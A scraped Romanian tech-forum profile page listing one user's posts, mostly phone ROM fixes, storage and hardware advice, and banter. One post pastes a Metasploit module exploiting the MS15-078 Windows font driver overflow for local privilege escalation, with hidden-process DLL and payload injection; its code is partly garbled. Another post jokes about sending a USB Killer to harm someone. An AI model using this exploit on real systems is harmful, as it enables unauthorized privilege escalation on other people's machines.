-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Everything posted by LLegoLLaS
-
To'ar??u c0bra1337 explica ce-s alea FPS.Pe indelete ca nu-i graba.
-
programezi in Instagram++ ? citeste tematica forumului.Sau ti-ai facut contu? sa agati 'ec?ri, nebunule?
-
reinstaleaza un ROM oficial petru inceput, cu ODIN de pe sammobile.com
-
Nea Tr?ienel e long-shot, mai dureaza putin dar se duce si el Sa inteleg ca avem o noua sljmba, PEO , Postac Executive Officer.
-
off: ''usi de garaj'' fute-m-as in ele de cuvinte, o singura data am cautat si ma spameaza cu reclame ) on: era un site gen seranking (i may be wrong)
-
miner server de ce sa excluzi editarea video? ...cat mai multe simultan...Cu vreo 4-5 monitoare
-
Pentru ce tara e giveaway?US/GER/ITA nu merg
-
BB Hackpedia (Hackpedia.info a plecat la casa lui)
LLegoLLaS replied to iulik's topic in Stiri securitate
Din moment ce spune "sub alta forma" nu cred ca vinde db-ul.Ar fi penal -
Ramane doar sa iti faci server acasa si sa-l tii in debara
-
USB KILLER 2.0 CAN BRICK YOUR COMPUTER IN MERE SECONDS
LLegoLLaS replied to Nytro's topic in Stiri securitate
Scoate 220 cum scot si electrosocurile nu stiu cate sute dintr-o baterie de 12V. E clar ca nu functioenaza pe pcurile si laptopurile noi care au protectii.Cred ca a mai fost postat USBKiller pe aici ca am impresia ca ma repet . @hades intrebai pe chat cum sa faci nasoale cuiva.Trimite-i unu' de-asta //2000th post !! -
Salut, bine ai venit.Daca stii deja C++ decent e relativ usor sa te extinzi.Invata si alte limbaje de programare si ai sa-ti dai seama in timp ce vrei sa faci.Nu iti poate spune nimeni de unde sa incepi in domeniul asta
-
quad sim respectiv trimple sim.Chiar daca nu cred ca e multiple standby
-
Banuiesc ca e vorba de Galaxy S3 poti incepe de aici: [R&D] Fixing the generic IMEI problem | Samsung Galaxy Nexus | XDA Forums Ce ai facut gresit: Cand ai formatat ai bifat "Erase EFS" probabil. Vezi si: [REF] IMEI / EFS - Know this stuff (i9300) -… | Samsung Galaxy S III I9300, I9305 | XDA Forums //call baby
-
avand in vedere ca ai limita la smsuri trimise la toti operatorii, s-ar putea sa vrei sa iei in calcul asta: LG A395 - Full phone specifications aici intrebare: operatorul citeste IMEI/ blocheaza si in functie de IMEI? sau android: Samsung Galaxy Star Trios S5283 - Full phone specifications
-
This module requires Metasploit require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ '6.3.9600.17393', '6.3.9600.17630', '6.3.9600.17694', '6.3.9600.17796', '6.3.9600.17837', '6.3.9600.17915' ] NT_VERSIONS = [ '6.3.9600.17415', '6.3.9600.17630', '6.3.9600.17668', '6.3.9600.17936' ] include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eugene Ching', # vulnerability discovery and exploit 'Mateusz Jurczyk', # vulnerability discovery 'Cedric Halbronn', # vulnerability and exploit analysis 'juan vazquez' # msf module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 8.1 x64', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-2426'], ['CVE', '2015-2433'], ['MSB', 'MS15-078'], ['MSB', 'MS15-080'], ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480'] ], 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0 })) end def patch_win32k_offsets(dll) @win32k_offsets.nil? set_nt_offsets fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil? begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll') library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the exploit DLL into #{process.pid}...") dll = '' ::File.open(library_path, 'rb') { |f| dll = f.read } patch_win32k_offsets(dll) patch_nt_offsets(dll) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end sursa: bugsearch.net
-
- 1
-
-
Da, se pare ca e lipt, deci sunt amandoua in acelasi modul
-
Daca e asta Display cu touchscreen BlackBerry Storm2 9550 versiunea 002/111 Original | GSMnet.ro Tu stii daca merita edit: nu am vreo legatura cu gsmnet, a nu se considera reclama
-
tema o fi faina, da' ideea e originala ca masinile chinezesti
-
Se poate mina de pe cam orice OS Mai ales distributii linux OS-ul e de fapt cam cea mai mica problema.hardware sa ai
-
Presupun ca nu dispui de buget pentru SSD dar ai nevoie de capacitate mare, cel putin 1 TB. In situatia asta cea mai potrivita solutie e sa-ti iei 2,3,..n hdduri pe care le legi in RAID0.Cu cat mai multe cu atat viteza creste. Vezi Western Digital Black/Red. Daca vrei 1 TB iei 2x500 Daca vrei 1.5 TB iei 3x500 GB Daca vreo 2 TB iei 2x 1TB Daca vrei 3 TB iei 3x 1TB .De vazut si alte configuratii RAID pentru ca se schimba datele problemei daca rei backup etc.Dar probabil vrei home use ,caz in care 2 TB is suficienti
-
Am facut si eu upgrade pe laptop.E deja al doilea. 8 >> 8.1 >> 10 .Instalarea a durat cam 25 de min cu tot cu download.So far so good, merge bine, ma distrez teribil cu Cortana Observ ca nu are nicio hiba cu driverele, si am foarte multe deviceuri nu foarte comune gen modem 3g , modem rj11, senzor de amprenta, touchstick (intre taste), light sensor.
-
baga romul din nou rom-downloads - Support | HTC United States